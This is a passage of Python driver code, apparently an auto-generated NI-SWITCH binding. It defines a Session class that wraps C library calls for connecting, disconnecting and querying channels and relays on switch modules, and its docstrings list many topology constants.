NISWITCH_TOPOLOGY_2531_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2531_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_16X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_4X128_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_8X64_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_16X16_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_4X64_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_SIXTEEN_2X16_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_DUAL_4X32_MATRIX
NISWITCH_TOPOLOGY_2533_1_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2534_1_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2535_1_WIRE_4X136_MATRIX
NISWITCH_TOPOLOGY_2536_1_WIRE_8X68_MATRIX
NISWITCH_TOPOLOGY_2540_1_WIRE_8X9_MATRIX
NISWITCH_TOPOLOGY_2541_1_WIRE_8X12_MATRIX
NISWITCH_TOPOLOGY_2542_QUAD_2X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2543_DUAL_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2544_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2545_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2546_DUAL_4X1_MUX
NISWITCH_TOPOLOGY_2547_8X1_MUX NISWITCH_TOPOLOGY_2548_4_SPDT
NISWITCH_TOPOLOGY_2549_TERMINATED_2_SPDT
NISWITCH_TOPOLOGY_2554_4X1_MUX
NISWITCH_TOPOLOGY_2555_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2556_DUAL_4X1_MUX
NISWITCH_TOPOLOGY_2557_8X1_MUX NISWITCH_TOPOLOGY_2558_4_SPDT
NISWITCH_TOPOLOGY_2559_TERMINATED_2_SPDT
NISWITCH_TOPOLOGY_2564_16_SPST NISWITCH_TOPOLOGY_2564_8_DPST
NISWITCH_TOPOLOGY_2565_16_SPST NISWITCH_TOPOLOGY_2566_16_SPDT
NISWITCH_TOPOLOGY_2566_8_DPDT NISWITCH_TOPOLOGY_2567_INDEPENDENT
NISWITCH_TOPOLOGY_2568_15_DPST NISWITCH_TOPOLOGY_2568_31_SPST
NISWITCH_TOPOLOGY_2569_100_SPST NISWITCH_TOPOLOGY_2569_50_DPST
NISWITCH_TOPOLOGY_2570_20_DPDT NISWITCH_TOPOLOGY_2570_40_SPDT
NISWITCH_TOPOLOGY_2571_66_SPDT
NISWITCH_TOPOLOGY_2575_1_WIRE_196X1_MUX
NISWITCH_TOPOLOGY_2575_2_WIRE_98X1_MUX
NISWITCH_TOPOLOGY_2575_2_WIRE_95X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_OCTAL_8X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_SIXTEEN_4X1_MUX
NISWITCH_TOPOLOGY_2576_INDEPENDENT
NISWITCH_TOPOLOGY_2584_1_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2584_1_WIRE_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2584_2_WIRE_6X1_MUX
NISWITCH_TOPOLOGY_2584_INDEPENDENT
NISWITCH_TOPOLOGY_2585_1_WIRE_10X1_MUX
NISWITCH_TOPOLOGY_2586_10_SPST NISWITCH_TOPOLOGY_2586_5_DPST
NISWITCH_TOPOLOGY_2590_4X1_MUX NISWITCH_TOPOLOGY_2591_4X1_MUX
NISWITCH_TOPOLOGY_2593_16X1_MUX
NISWITCH_TOPOLOGY_2593_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2593_DUAL_8X1_MUX
NISWITCH_TOPOLOGY_2593_DUAL_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2593_INDEPENDENT NISWITCH_TOPOLOGY_2594_4X1_MUX
NISWITCH_TOPOLOGY_2595_4X1_MUX
NISWITCH_TOPOLOGY_2596_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2597_6X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2598_DUAL_TRANSFER
NISWITCH_TOPOLOGY_2599_2_SPDT NISWITCH_TOPOLOGY_2720_INDEPENDENT
NISWITCH_TOPOLOGY_2722_INDEPENDENT
NISWITCH_TOPOLOGY_2725_INDEPENDENT
NISWITCH_TOPOLOGY_2727_INDEPENDENT
NISWITCH_TOPOLOGY_2737_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2738_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2739_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_2746_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_2747_DUAL_8X1_MUX
NISWITCH_TOPOLOGY_2748_16X1_MUX
NISWITCH_TOPOLOGY_2790_INDEPENDENT
NISWITCH_TOPOLOGY_2796_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2797_6X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2798_DUAL_TRANSFER
NISWITCH_TOPOLOGY_2799_2_SPDT
simulate (bool): Enables simulation of the switch module specified in the resource name
parameter. Valid Values: True - simulate False - Don't simulate
(Default Value)
reset_device (bool): Specifies whether to reset the switch module during the initialization
process. Valid Values: True - Reset Device (Default Value) False
- Currently unsupported. The device will not reset.
Returns:
session (niswitch.Session): A session object representing the device.
'''
super(Session, self).__init__(repeated_capability_list=[], vi=None, library=None, encoding=None, freeze_it=False)
self._library = _library_singleton.get()
self._encoding = 'windows-1251'
# Call specified init function
self._vi = 0 # This must be set before calling _init_with_topology().
self._vi = self._init_with_topology(resource_name, topology, simulate, reset_device)
# Instantiate any repeated capability objects
self.channels = _RepeatedCapabilities(self, '')
# Store the parameter list for later printing in __repr__
param_list = []
param_list.append("resource_name=" + pp.pformat(resource_name))
param_list.append("topology=" + pp.pformat(topology))
param_list.append("simulate=" + pp.pformat(simulate))
param_list.append("reset_device=" + pp.pformat(reset_device))
self._param_list = ', '.join(param_list)
self._is_frozen = True
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def initiate(self):
'''initiate
Commits the configured scan list and trigger settings to hardware and
initiates the scan. If niSwitch Commit was called earlier, niSwitch
Initiate Scan only initiates the scan and returns immediately. Once the
scanning operation begins, you cannot perform any other operation other
than GetAttribute, AbortScan, or SendSoftwareTrigger. All other
methods return NISWITCH_ERROR_SCAN_IN_PROGRESS. To stop the
scanning operation, To stop the scanning operation, call
abort.
Note:
This method will return a Python context manager that will initiate on entering and abort on exit.
'''
return _Scan(self)
def close(self):
'''close
Terminates the NI-SWITCH session and all of its properties and
deallocates any memory resources the driver uses. Notes: (1) You must
unlock the session before calling _close. (2) After calling
_close, you cannot use the instrument driver again until you
call init or InitWithOptions.
Note:
One or more of the referenced methods are not in the Python API for this driver.
Note:
This method is not needed when using the session context manager
'''
try:
self._close()
except errors.DriverError:
self._vi = 0
raise
self._vi = 0
''' These are code-generated '''
@ivi_synchronized
def abort(self):
r'''abort
Aborts the scan in progress. Initiate a scan with
initiate. If the switch module is not scanning,
NISWITCH_ERROR_NO_SCAN_IN_PROGRESS error is returned.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_AbortScan(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def can_connect(self, channel1, channel2):
r'''can_connect
Verifies that a path between channel 1 and channel 2 can be created. If
a path is possible in the switch module, the availability of that path
is returned given the existing connections. If the path is possible but
in use, a NISWITCH_WARN_IMPLICIT_CONNECTION_EXISTS warning is
returned.
Args:
channel1 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 2 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: ""
channel2 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 1 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: ""
Returns:
path_capability (enums.PathCapability): Indicates whether a path is valid. Possible values include:
------------------------------------ PathCapability.PATH_AVAILABLE 1
PathCapability.PATH_EXISTS 2 PathCapability.PATH_UNSUPPORTED 3
NISWITCH_VAL_RSRC_IN_USE 4 PathCapability.SOURCE_CONFLICT 5
PathCapability.CHANNEL_NOT_AVAILABLE 6 Notes: (1)
PathCapability.PATH_AVAILABLE indicates that the driver can create the
path at this time. (2) PathCapability.PATH_EXISTS indicates that the
path already exists. (3) PathCapability.PATH_UNSUPPORTED indicates that
the instrument is not capable of creating a path between the channels
you specify. (4) NISWITCH_VAL_RSRC_IN_USE indicates that although
the path is valid, the driver cannot create the path at this moment
because the switch device is currently using one or more of the required
channels to create another path. You must destroy the other path before
creating this one. (5) PathCapability.SOURCE_CONFLICT indicates that
the instrument cannot create a path because both channels are connected
to a different source channel. (6)
PathCapability.CHANNEL_NOT_AVAILABLE indicates that the driver cannot
create a path between the two channels because one of the channels is a
configuration channel and thus unavailable for external connections.
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel1_ctype = ctypes.create_string_buffer(channel1.encode(self._encoding)) # case C020
channel2_ctype = ctypes.create_string_buffer(channel2.encode(self._encoding)) # case C020
path_capability_ctype = _visatype.ViInt32() # case S220
error_code = self._library.niSwitch_CanConnect(vi_ctype, channel1_ctype, channel2_ctype, None if path_capability_ctype is None else (ctypes.pointer(path_capability_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return enums.PathCapability(path_capability_ctype.value)
@ivi_synchronized
def commit(self):
r'''commit
Downloads the configured scan list and trigger settings to hardware.
Calling commit optional as it is implicitly called during
initiate. Use commit to arm triggers in a given
order or to control when expensive hardware operations are performed.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_Commit(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def connect(self, channel1, channel2):
r'''connect
Creates a path between channel 1 and channel 2. The driver calculates
and uses the shortest path between the two channels. Refer to Immediate
Operations for information about Channel Usage types. If a path is not
available, the method returns one of the following errors: -
NISWITCH_ERROR_EXPLICIT_CONNECTION_EXISTS, if the two channels are
already explicitly connected by calling either the connect or
set_path method. -
NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL, if a channel is a
configuration channel. Error elaboration contains information about
which of the two channels is a configuration channel. -
NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES, if both channels are
connected to a different source. Error elaboration contains information
about sources channel 1 and 2 connect to. -
NISWITCH_ERROR_CANNOT_CONNECT_TO_ITSELF, if channels 1 and 2 are
one and the same channel. - NISWITCH_ERROR_PATH_NOT_FOUND, if the
driver cannot find a path between the two channels. Note: Paths are
bidirectional. For example, if a path exists between channels CH1 and
CH2, then the path also exists between channels CH2 and CH1.
Args:
channel1 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 2 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: None
channel2 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 1 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: None
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel1_ctype = ctypes.create_string_buffer(channel1.encode(self._encoding)) # case C020
channel2_ctype = ctypes.create_string_buffer(channel2.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_Connect(vi_ctype, channel1_ctype, channel2_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def connect_multiple(self, connection_list):
r'''connect_multiple
Creates the connections between channels specified in Connection List.
Specify connections with two endpoints only or the explicit path between
two endpoints. NI-SWITCH calculates and uses the shortest path between
the channels. Refer to Setting Source and Configuration Channels for
information about channel usage types. In the event of an error,
connecting stops at the point in the list where the error occurred. If a
path is not available, the method returns one of the following errors:
- NISWITCH_ERROR_EXPLICIT_CONNECTION_EXISTS, if the two channels are
already explicitly connected. -
NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL, if a channel is a
configuration channel. Error elaboration contains information about
which of the two channels is a configuration channel. -
NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES, if both channels are
connected to a different source. Error elaboration contains information
about sources channel 1 and 2 to connect. -
NISWITCH_ERROR_CANNOT_CONNECT_TO_ITSELF, if channels 1 and 2 are
one and the same channel. - NISWITCH_ERROR_PATH_NOT_FOUND, if the
driver cannot find a path between the two channels. Note: Paths are
bidirectional. For example, if a path exists between channels ch1 and
ch2, then the path also exists between channels ch1 and ch2.
Args:
connection_list (str): Connection List specifies a list of connections between channels to
make. NI-SWITCH validates the connection list, and aborts execution of
the list if errors are returned. Refer to Connection and Disconnection
List Syntax for valid connection list syntax and examples. Refer to
Devices Overview for valid channel names for the switch module. Example
of a valid connection list: c0 -> r1, [c2 -> r2 -> c3] In this example,
r2 is a configuration channel. Default value: None
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
connection_list_ctype = ctypes.create_string_buffer(connection_list.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_ConnectMultiple(vi_ctype, connection_list_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def disable(self):
r'''disable
Places the switch module in a quiescent state where it has minimal or no
impact on the system to which it is connected. All channels are
disconnected and any scan in progress is aborted.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_Disable(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def disconnect(self, channel1, channel2):
r'''disconnect
This method destroys the path between two channels that you create
with the connect or set_path method. If a path is
not connected or not available, the method returns the
IVISWTCH_ERROR_NO_SUCH_PATH error.
Args:
channel1 (str): Input one of the channel names of the path to break. Pass the other
channel name as the channel 2 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: None
channel2 (str): Input one of the channel names of the path to break. Pass the other
channel name as the channel 1 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: None
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel1_ctype = ctypes.create_string_buffer(channel1.encode(self._encoding)) # case C020
channel2_ctype = ctypes.create_string_buffer(channel2.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_Disconnect(vi_ctype, channel1_ctype, channel2_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def disconnect_all(self):
r'''disconnect_all
Breaks all existing paths. If the switch module cannot break all paths,
NISWITCH_WARN_PATH_REMAINS warning is returned.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_DisconnectAll(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def disconnect_multiple(self, disconnection_list):
r'''disconnect_multiple
Breaks the connections between channels specified in Disconnection List.
If no connections exist between channels, NI-SWITCH returns an error. In
the event of an error, the VI stops at the point in the list where the
error occurred.
Args:
disconnection_list (str): Disconnection List specifies a list of connections between channels to
break. NI-SWITCH validates the disconnection list, and aborts execution
of the list if errors are returned. Refer to Connection and
Disconnection List Syntax for valid disconnection list syntax and
examples. Refer to Devices Overview for valid channel names for the
switch module. Example of a valid disconnection list: c0 -> r1, [c2 ->
r2 -> c3] In this example, r2 is a configuration channel. Default value:
None
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
disconnection_list_ctype = ctypes.create_string_buffer(disconnection_list.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_DisconnectMultiple(vi_ctype, disconnection_list_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def get_channel_name(self, index):
r'''get_channel_name
Returns the channel string that is in the channel table at the specified
index. Use get_channel_name in a For Loop to get a complete list
of valid channel names for the switch module. Use the Channel Count
property to determine the number of channels.
Args:
index (int): A 1-based index into the channel table. Default value: 1 Maximum value:
Value of Channel Count property.
Returns:
channel_name_buffer (str): Returns the channel name that is in the channel table at the index you
specify.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
index_ctype = _visatype.ViInt32(index) # case S150
buffer_size_ctype = _visatype.ViInt32() # case S170
channel_name_buffer_ctype = None # case C050
error_code = self._library.niSwitch_GetChannelName(vi_ctype, index_ctype, buffer_size_ctype, channel_name_buffer_ctype)
errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
buffer_size_ctype = _visatype.ViInt32(error_code) # case S180
channel_name_buffer_ctype = (_visatype.ViChar * buffer_size_ctype.value)() # case C060
error_code = self._library.niSwitch_GetChannelName(vi_ctype, index_ctype, buffer_size_ctype, channel_name_buffer_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return channel_name_buffer_ctype.value.decode(self._encoding)
@ivi_synchronized
def get_path(self, channel1, channel2):
r'''get_path
Returns a string that identifies the explicit path created with
connect. Pass this string to set_path to establish
the exact same path in future connections. In some cases, multiple paths
are available between two channels. When you call connect, the
driver selects an available path. With connect, there is no
guarantee that the driver selected path will always be the same path
through the switch module. get_path only returns those paths
explicitly created by niSwitch Connect Channels or set_path.
For example, if you connect channels CH1 and CH3,and then channels CH2
and CH3, an explicit path between channels CH1 and CH2 does not exist an
error is returned
Args:
channel1 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 2 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: ""
channel2 (str): Input one of the channel names of the desired path. Pass the other
channel name as the channel 1 parameter. Refer to Devices Overview for
valid channel names for the switch module. Examples of valid channel
names: ch0, com0, ab0, r1, c2, cjtemp Default value: ""
Returns:
path (str): A string composed of comma-separated paths between channel 1 and channel
2. The first and last names in the path are the endpoints of the path.
All other channels in the path are configuration channels. Examples of
returned paths: ch0->com0, com0->ab0
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel1_ctype = ctypes.create_string_buffer(channel1.encode(self._encoding)) # case C020
channel2_ctype = ctypes.create_string_buffer(channel2.encode(self._encoding)) # case C020
buffer_size_ctype = _visatype.ViInt32() # case S170
path_ctype = None # case C050
error_code = self._library.niSwitch_GetPath(vi_ctype, channel1_ctype, channel2_ctype, buffer_size_ctype, path_ctype)
errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
buffer_size_ctype = _visatype.ViInt32(error_code) # case S180
path_ctype = (_visatype.ViChar * buffer_size_ctype.value)() # case C060
error_code = self._library.niSwitch_GetPath(vi_ctype, channel1_ctype, channel2_ctype, buffer_size_ctype, path_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return path_ctype.value.decode(self._encoding)
@ivi_synchronized
def get_relay_count(self, relay_name):
r'''get_relay_count
Returns the number of times the relay has changed from Closed to Open.
Relay count is useful for tracking relay lifetime and usage. Call
wait_for_debounce before get_relay_count to ensure an
accurate count. Refer to the Relay Count topic in the NI Switches Help
to determine if the switch module supports relay counting.
Args:
relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
relay names for the switch module.
Returns:
relay_count (int): The number of relay cycles.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding)) # case C020
relay_count_ctype = _visatype.ViInt32() # case S220
error_code = self._library.niSwitch_GetRelayCount(vi_ctype, relay_name_ctype, None if relay_count_ctype is None else (ctypes.pointer(relay_count_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return int(relay_count_ctype.value)
@ivi_synchronized
def get_relay_name(self, index):
r'''get_relay_name
Returns the relay name string that is in the relay list at the specified
index. Use get_relay_name in a For Loop to get a complete list
of valid relay names for the switch module. Use the Number of Relays
property to determine the number of relays.
Args:
index (int): A 1-based index into the channel table. Default value: 1 Maximum value:
Value of Channel Count property.
Returns:
relay_name_buffer (str): Returns the relay name for the index you specify.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
index_ctype = _visatype.ViInt32(index) # case S150
relay_name_buffer_size_ctype = _visatype.ViInt32() # case S170
relay_name_buffer_ctype = None # case C050
error_code = self._library.niSwitch_GetRelayName(vi_ctype, index_ctype, relay_name_buffer_size_ctype, relay_name_buffer_ctype)
errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
relay_name_buffer_size_ctype = _visatype.ViInt32(error_code) # case S180
relay_name_buffer_ctype = (_visatype.ViChar * relay_name_buffer_size_ctype.value)() # case C060
error_code = self._library.niSwitch_GetRelayName(vi_ctype, index_ctype, relay_name_buffer_size_ctype, relay_name_buffer_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return relay_name_buffer_ctype.value.decode(self._encoding)
@ivi_synchronized
def get_relay_position(self, relay_name):
r'''get_relay_position
Returns the relay position for the relay specified in the Relay Name
parameter.
Args:
relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
relay names for the switch module.
Returns:
relay_position (enums.RelayPosition): Indicates whether the relay is open or closed. RelayPosition.OPEN 10
NIWITCH_VAL_CLOSED 11
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding)) # case C020
relay_position_ctype = _visatype.ViInt32() # case S220
error_code = self._library.niSwitch_GetRelayPosition(vi_ctype, relay_name_ctype, None if relay_position_ctype is None else (ctypes.pointer(relay_position_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return enums.RelayPosition(relay_position_ctype.value)
def _init_with_topology(self, resource_name, topology="Configured Topology", simulate=False, reset_device=False):
r'''_init_with_topology
Returns a session handle used to identify the switch in all subsequent
instrument driver calls and sets the topology of the switch.
__init__ creates a new IVI instrument driver session
for the switch specified in the resourceName parameter. The driver uses
the topology specified in the topology parameter and overrides the
topology specified in MAX. Note: When initializing an NI SwitchBlock
device with topology, you must specify the toplogy created when you
configured the device in MAX, using either
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY or the toplogy string of the
device. Refer to the Initializing with Toplogy for NI SwitchBlock
Devices topic in the NI Switches Help for information about determining
the topology string of an NI SwitchBlock device. By default, the switch
is reset to a known state. Enable simulation by specifying the topology
and setting the simulate parameter to True.
Args:
resource_name (str): Resource name of the switch module to initialize. Default value: None
Syntax: Optional fields are shown in square brackets ([]). Configured in
MAX Under Valid Syntax Devices and Interfaces DeviceName Traditional
NI-DAQ Devices SCXI[chassis ID]::slot number PXI System PXI[bus
number]::device number TIP: IVI logical names are also valid for the
resource name. Default values for optional fields: chassis ID = 1 bus
number = 0 Example resource names: Resource Name Description SC1Mod3
NI-DAQmx module in chassis "SC1" slot 3 MySwitch NI-DAQmx module renamed
to "MySwitch" SCXI1::3 Traditional NI-DAQ module in chassis 1, slot 3
SCXI::3 Traditional NI-DAQ module in chassis 1, slot 3 PXI0::16 PXI bus
0, device number 16 PXI::16 PXI bus 0, device number 16
topology (str): Pass the topology name you want to use for the switch you specify with
Resource Name parameter. You can also pass
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY to use the last topology that
was configured for the device in MAX. Default Value:
NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY Valid Values:
NISWITCH_TOPOLOGY_1127_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1127_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_1127_2_WIRE_4X8_MATRIX
NISWITCH_TOPOLOGY_1127_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_1127_INDEPENDENT
NISWITCH_TOPOLOGY_1128_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1128_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_1128_2_WIRE_4X8_MATRIX
NISWITCH_TOPOLOGY_1128_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_1128_INDEPENDENT
NISWITCH_TOPOLOGY_1129_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_DUAL_8X16_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_DUAL_4X32_MATRIX
NISWITCH_TOPOLOGY_1129_2_WIRE_QUAD_4X16_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_256X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_DUAL_128X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_8x32_MATRIX
NISWITCH_TOPOLOGY_1130_1_WIRE_OCTAL_32X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_QUAD_64X1_MUX
NISWITCH_TOPOLOGY_1130_1_WIRE_SIXTEEN_16X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_4X32_MATRIX
NISWITCH_TOPOLOGY_1130_2_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_1130_2_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_1130_4_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_1130_4_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_1130_INDEPENDENT NISWITCH_TOPOLOGY_1160_16_SPDT
NISWITCH_TOPOLOGY_1161_8_SPDT
NISWITCH_TOPOLOGY_1163R_OCTAL_4X1_MUX
NISWITCH_TOPOLOGY_1166_16_DPDT NISWITCH_TOPOLOGY_1166_32_SPDT
NISWITCH_TOPOLOGY_1167_INDEPENDENT
NISWITCH_TOPOLOGY_1169_100_SPST NISWITCH_TOPOLOGY_1169_50_DPST
NISWITCH_TOPOLOGY_1175_1_WIRE_196X1_MUX
NISWITCH_TOPOLOGY_1175_2_WIRE_98X1_MUX
NISWITCH_TOPOLOGY_1175_2_WIRE_95X1_MUX
NISWITCH_TOPOLOGY_1190_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1191_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1192_8_SPDT NISWITCH_TOPOLOGY_1193_32X1_MUX
NISWITCH_TOPOLOGY_1193_16X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_1193_DUAL_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_QUAD_8X1_MUX
NISWITCH_TOPOLOGY_1193_QUAD_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_1193_INDEPENDENT
NISWITCH_TOPOLOGY_1194_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_1195_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_2501_1_WIRE_48X1_MUX
NISWITCH_TOPOLOGY_2501_1_WIRE_48X1_AMPLIFIED_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_24X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_24X1_AMPLIFIED_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_DUAL_12X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_QUAD_6X1_MUX
NISWITCH_TOPOLOGY_2501_2_WIRE_4X6_MATRIX
NISWITCH_TOPOLOGY_2501_4_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2503_1_WIRE_48X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_24X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_DUAL_12X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_QUAD_6X1_MUX
NISWITCH_TOPOLOGY_2503_2_WIRE_4X6_MATRIX
NISWITCH_TOPOLOGY_2503_4_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2510_INDEPENDENT
NISWITCH_TOPOLOGY_2512_INDEPENDENT
NISWITCH_TOPOLOGY_2514_INDEPENDENT
NISWITCH_TOPOLOGY_2515_INDEPENDENT NISWITCH_TOPOLOGY_2520_80_SPST
NISWITCH_TOPOLOGY_2521_40_DPST NISWITCH_TOPOLOGY_2522_53_SPDT
NISWITCH_TOPOLOGY_2523_26_DPDT
NISWITCH_TOPOLOGY_2524_1_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_DUAL_64X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_2524_1_WIRE_SIXTEEN_8X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_64X1_MUX
